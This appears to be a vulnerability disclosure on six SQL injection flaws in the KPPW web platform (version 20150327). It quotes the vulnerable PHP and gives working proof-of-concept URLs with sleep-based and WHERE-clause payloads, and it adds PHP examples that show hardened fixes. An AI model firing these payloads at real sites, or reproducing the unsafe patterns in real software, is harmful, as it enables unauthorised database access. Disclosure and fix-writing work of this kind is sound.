### Brief description:
Way too many holes.
### Details:
KPPW, latest version 20150327
Injection 1:
Vulnerable file: /control/tasklist.php
```
$m = intval($m);
$i = intval($i);
$s = intval($s);
$r = intval($r);
$o = intval($o);
$pd = intval($pd);
// note: $p is not cast here alongside the other parameters
```
```
$m and $strUrl .="&m=".$m;
$s and $strUrl .="&s=".$s;
$r and $strUrl .="&r=".$r;
$i and $strUrl .="&i=".$i;
$pd and $strUrl .="&pd=".$pd;
$o and $strUrl .="&o=".$o;
$p and $strUrl .="&p=".intval($p);
$ky and $strUrl .="&ky=".$ky;
```
Two places in the code fail to pass the `$p` parameter through intval:
```
if (intval ( $p )) {
    $strWhere .= " and a.province = ".intval($p);
    // $p is concatenated raw here; only the guard and a.province used intval()
    $two=db_factory::get_table_data("*","witkey_district","upid=".$p);
}
```
The intval check is trivially bypassed, resulting in injection.
Proof:
http://127.0.0.1/kppw0327/index.php?do=tasklist&m=2&s=2&r=2&o=5&p=1 || sleep(5)
![1.png](https://images.seebug.org/upload/201504/28161214a74e189b812ccf40ef1332bdcaffdf09.png)
Injection 2:
Vulnerable file: /control/goodslist.php
```
$m and $strUrl .="&m=".intval($m);
$intPage and $strUrl .="&intPage=".intval($intPage);
$i and $strUrl .="&i=".intval($i);
$pd and $strUrl .="&pd=".intval($pd);
$o and $strUrl .="&o=".strval($o);
$p and $strUrl .="&p=".intval($p);
$ky and $strUrl .="&ky=".$ky;
```
The `$p` parameter is again not passed through intval:
```
if (intval ( $p )) {
    $strWhere .= " and a.province = ".intval($p);
    // same pattern as tasklist.php: raw $p reaches the query
    $two=db_factory::get_table_data("*","witkey_district","upid=".$p);
}
```
Likewise results in injection.
Proof:
http://127.0.0.1/kppw0327/index.php?do=goodslist&m=2&s=2&r=2&o=5&p=1 || 1=sleep(5)
![2.jpg](https://images.seebug.org/upload/201504/28161609e1e2ce34221a75b6ad5fe4773c860c43.jpg)
Injection 3:
Vulnerable file: same as above
```
if (intval ( $twoid )) {
    $arrCitytwo = CommonClass::getDistrictById($twoid);
    $strWhere .= " and a.city = ".intval($twoid);
    // $twoid is concatenated raw here, while the guard and the URL use intval()
    $three=db_factory::get_table_data("*","witkey_district","upid=".$twoid);
    $twoid and $strUrl .="&twoid=".intval($twoid);
}
```
Same pattern.
Proof:
http://127.0.0.1/kppw0327/index.php?do=goodslist&m=7&m=0&twoid=1xxx
![3.jpg](https://images.seebug.org/upload/201504/28161756e44f827a08d461ba4e7075342d22d6e7.jpg)
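As an added example (not KPPW's code), here is the guard-then-concatenate pattern shared by injections 1 to 3 next to a hardened version; the function names and the `filter_var` validation are my own choice, not the project's.

```php
<?php
// Added example, not KPPW's code. Models the guard-then-concatenate pattern
// from tasklist.php / goodslist.php and a hardened replacement.

// Vulnerable shape: intval() is used for the guard and for a.province,
// but the raw request value is concatenated into the witkey_district lookup.
function districtWhereVulnerable($p): ?string
{
    if (intval($p)) {            // intval("1 || sleep(5)") === 1, so the guard passes
        return "upid=" . $p;     // and the raw string reaches the SQL
    }
    return null;
}

// Hardened shape: validate once, reject anything that is not a plain positive
// integer, and only ever use the validated integer afterwards. The smallest
// fix in KPPW's own style is `$p = intval($p);` next to the other casts.
function districtWhereHardened($p): ?string
{
    if (!is_string($p) && !is_int($p)) {
        return null;             // non-scalar values are rejected too
    }
    $id = filter_var($p, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;             // "1 || sleep(5)" and "7abc" are rejected outright
    }
    return "upid=" . $id;        // $id is an int, so concatenation is safe
}

// Constructed inputs: a normal id, the shape used in the PoC above, and junk.
foreach (['1', '1 || sleep(5)', '7abc', '0'] as $in) {
    printf("%-18s vulnerable=%-20s hardened=%s\n",
        var_export($in, true),
        var_export(districtWhereVulnerable($in), true),
        var_export(districtWhereHardened($in), true));
}
```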
### Proof of vulnerability:
Injection 4:
Vulnerable file: /control/ajax/balance.php
```
$id=intval($id);
$orderId=intval($orderId);
$arrMemer=db_factory::get_one("select * from ".TABLEPRE."witkey_member where uid=".$gUid);
$twoPassword = keke_user_class::get_password ( $arrMemer['password'], $arrMemer['rand_code'] );
if (isset($formhash)&&kekezu::submitcheck($formhash)) {
    $sec_code=kekezu::escape(trim($zfpwd));
    $strMd5Pwd = keke_user_class::get_password ( $sec_code, $gUserInfo ['rand_code'] );
    $arrUserInfo=db_factory::get_one(sprintf("select * from %switkey_space where uid=%d and sec_code='%s'",TABLEPRE,intval($gUid),$strMd5Pwd));
    // $strSql is only assigned inside the cases below; there is no default
    // case and no initial value, so an unmatched $type leaves it untouched
    switch ($type){
        case 'task':
            $fina_type="pub_".$type;
            $tips='你已经支付成功了,不需要再次支付!';
            $stryzfUrl='index.php?do=task&id='.intval($id);
            $strwzfUrl='index.php?do=yepay&type='.$type.'&id='.intval($id);
            $strSql="select * from ".TABLEPRE."witkey_finance where obj_id=".intval($id)." and fina_action='.$fina_type.'";
            break;
        case 'goods':
            $fina_type="buy_service";
            $tips='你已经支付成功了,不需要再次支付!';
            $stryzfUrl='index.php?do=goods&id='.intval($id);
            $strwzfUrl='index.php?do=order&sid='.$id.'&step=step2&orderId='.$orderId.'&action=confirm_pay';
            $strSql="select * from ".TABLEPRE."witkey_finance where order_id=".intval($orderId)." and fina_action='.$fina_type.'";
            break;
        case 'service':
            $fina_type="buy_service";
            $tips='你已经支付成功了,不需要再次支付!';
            $stryzfUrl='index.php?do=goods&id='.intval($id);
            $strwzfUrl='index.php?do=order&sid='.$id.'&step=step3&orderId='.$orderId.'&action=pay';
            $strSql="select * from ".TABLEPRE."witkey_finance where order_id=".intval($orderId)." and fina_action='.$fina_type.'";
            break;
        case 'pubservice':
            $tips='你已经支付成功了,不需要再次支付!';
            $stryzfUrl='index.php?do=goods&id='.intval($id);
            $strwzfUrl='index.php?do=yepay&type=service&id='.intval($id)."&orderId=".$orderId;
            $strSql="select * from ".TABLEPRE."witkey_order where order_id=".intval($orderId)." and order_status='ok'";
            break;
        case 'gy':
            $fina_type="buy_gy";
            $tips['errors']['zfpwd'] = '你已经支付成功了,不需要再次支付!';
            $stryzfUrl=NULL;
            $strwzfUrl='index.php?do=gy&id='.$id.'&step=step3&orderId='.$orderId.'&action=pay';
            $strSql="select * from ".TABLEPRE."witkey_order where order_id=".intval($orderId)." and order_status='ok'";
            break;
        case 'taskCash':
            $fina_type="hosted_reward";
            $tips='你已经支付成功了,不需要再次支付!';
            $stryzfUrl='index.php?do=task&id='.intval($id);
            $strwzfUrl="index.php?do=taskhandle&op=consign&taskId=".$id;
            $strSql="select * from ".TABLEPRE."witkey_finance where obj_id=".intval($id)." and fina_action='.$fina_type.'";
            break;
    }
    if($arrUserInfo && $type){
        // whatever $strSql holds at this point is executed
        $arrFinance=db_factory::get_one($strSql);
        if($arrFinance){
            kekezu::show_msg($tips,$stryzfUrl,'','','success');
```
First, a look at how KPPW obtains its parameters:
```
$_R = $_REQUEST;
$_R = kekezu::k_input ( $_R );
$_GET = kekezu::k_input($_GET);
$_POST = kekezu::k_input($_POST);
$_R and extract ( $_R, EXTR_SKIP );
```
As you can see, `$strSql` is assigned inside each case. If we pass `$type=xxx`,
the switch is entered but none of the cases match,
so the `$strSql` parameter can be supplied by us in the request.
```
$arrFinance=db_factory::get_one($strSql);
```
It enters the query here.
Proof:
This requires registering an account; the payment password must also be your own real payment password, and that is all.
![4.png](https://images.seebug.org/upload/201504/28163029b42022dbc697e507eed5c16e3f2cd964.png)
Injection 5:
Vulnerable file: /control/ajax/banner.php
```
if($_R['a']==1){
    $arr['shop_background']="";
    // $_R['id'] is concatenated into the where clause without intval()
    db_factory::updatetable(TABLEPRE."witkey_shop", $arr, "uid=".$_R['id']);
    kekezu::show_msg('已清除','index.php?do=seller&id='.intval($id),NULL,NULL,'ok');
}elseif($_R['a']==2){
    $arr['banner']="";
    db_factory::updatetable(TABLEPRE."witkey_shop", $arr, "uid=".$_R['id']);
    kekezu::show_msg('已清除','index.php?do=seller&id='.intval($id),NULL,NULL,'ok');
}
```
`a` can be 1 or 2; either works.
`$_R['id']` goes straight into the query.
Proof:
http://127.0.0.1/kppw0327/index.php?do=ajax&view=banner&a=1&id=1xxxx
![5.png](https://images.seebug.org/upload/201504/2816340046e766ee20a62a2109eef6748099c108.png)
Injection 6:
Vulnerable file: /control/articlelist.php
```
<?php defined ( 'IN_KEKE' ) or exit ( 'Access Denied' );
$strNavActive = 'articlelist';
$strUrl = $_K['siteurl']."/index.php?do=articlelist";
$catid and $strUrl .="&catid=".intval($catid);
$intPage and $strUrl .="&intPage=".$intPage;
$arrArtCats = kekezu::get_table_data ( "*", "witkey_article_category", "cat_type='article' and art_cat_pid=1", "listorder asc", "", "", "", null );
$page and $intPage = intval($page);
$intPage = intval ( $intPage ) ? $intPage : 1;
$intPagesize = intval ( $intPagesize ) ? $intPagesize : 20;
intval($catid) and $intCatid = intval($catid) or $intCatid = intval($arrArtCats['0']['art_cat_id']);
// first use of $strWhere in the file: appended to, never initialised
$intCatid and $strWhere .= " and a.art_cat_id = $intCatid";
$strWhere.=" and a.is_show!=2";
$strWhere .=" order by is_recommend desc,a.listorder asc,pub_time desc";
$strSql = "select a.* ,b.cat_name from " . TABLEPRE . "witkey_article a left join " . TABLEPRE . "witkey_article_category b on a.art_cat_id=b.art_cat_id where b.cat_type='article' $strWhere";
```
The first time `$strWhere` appears it is already being appended to with `$strWhere .=`; it is never initialised.
So the initial value can be passed in directly; everything that follows is a `.=` append and does not interfere.
Proof:
http://127.0.0.1/kppw0327/index.php?do=articlelist&strWhere=%20and%201=1%23
![6.jpg](https://images.seebug.org/upload/201504/281639449b1d33ab0d20e3ef820bf48de087dd2c.jpg)
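As an added example (not KPPW's code) covering injections 4 and 6: a model of the `extract($_R, EXTR_SKIP)` flow showing how an uninitialised `$strWhere` or `$strSql` is seeded from the request, next to the initialise-and-allow-list fix. The function names, the shortened table names and the two-case switch are my own simplifications.

```php
<?php
// Added example, not KPPW's code. Models kekezu's extract($_R, EXTR_SKIP) flow
// to show why a variable a page never initialises ($strWhere in articlelist.php,
// $strSql in ajax/balance.php) can be preset from the request, and the fix.

// articlelist.php shape: $strWhere is only ever appended to.
function buildArticleWhere(array $request, bool $hardened): string
{
    if ($hardened) {
        $strWhere = '';                 // fix: initialise before any .=
    }
    extract($request, EXTR_SKIP);       // EXTR_SKIP only protects variables that already exist
    $strWhere = $strWhere ?? '';        // stands in for PHP treating the undefined variable as ''
    $intCatid = intval($catid ?? 0);
    $intCatid and $strWhere .= " and a.art_cat_id = $intCatid";
    $strWhere .= " and a.is_show!=2";
    return $strWhere;
}

// ajax/balance.php shape: $strSql is assigned per case, so an unknown $type
// reaches the query with whatever $strSql already held.
function financeSql(array $request, bool $hardened): ?string
{
    $allowed = ['task', 'goods'];       // two of the real cases, for brevity
    if ($hardened) {
        $strSql = null;                 // fix 1: known initial value
    }
    extract($request, EXTR_SKIP);
    $type = $type ?? '';
    if ($hardened && !in_array($type, $allowed, true)) {
        return null;                    // fix 2: allow-list $type before the switch
    }
    $id = intval($request['id'] ?? 0);
    switch ($type) {
        case 'task':
            $strSql = "select * from witkey_finance where obj_id=$id and fina_action='pub_task'";
            break;
        case 'goods':
            $strSql = "select * from witkey_finance where order_id=$id and fina_action='buy_service'";
            break;
    }
    return $strSql ?? null;
}

// Constructed request: an unknown type plus both page-internal variable names.
$req = ['type' => 'xxx', 'id' => '1', 'strWhere' => ' and 1=1#', 'strSql' => 'select 1'];
var_dump(buildArticleWhere($req, false));  // vulnerable: the request value becomes the prefix
var_dump(buildArticleWhere($req, true));   // hardened: only the page's own clauses
var_dump(financeSql($req, false));         // vulnerable: query text taken from the request
var_dump(financeSql($req, true));          // hardened: unknown type is refused
```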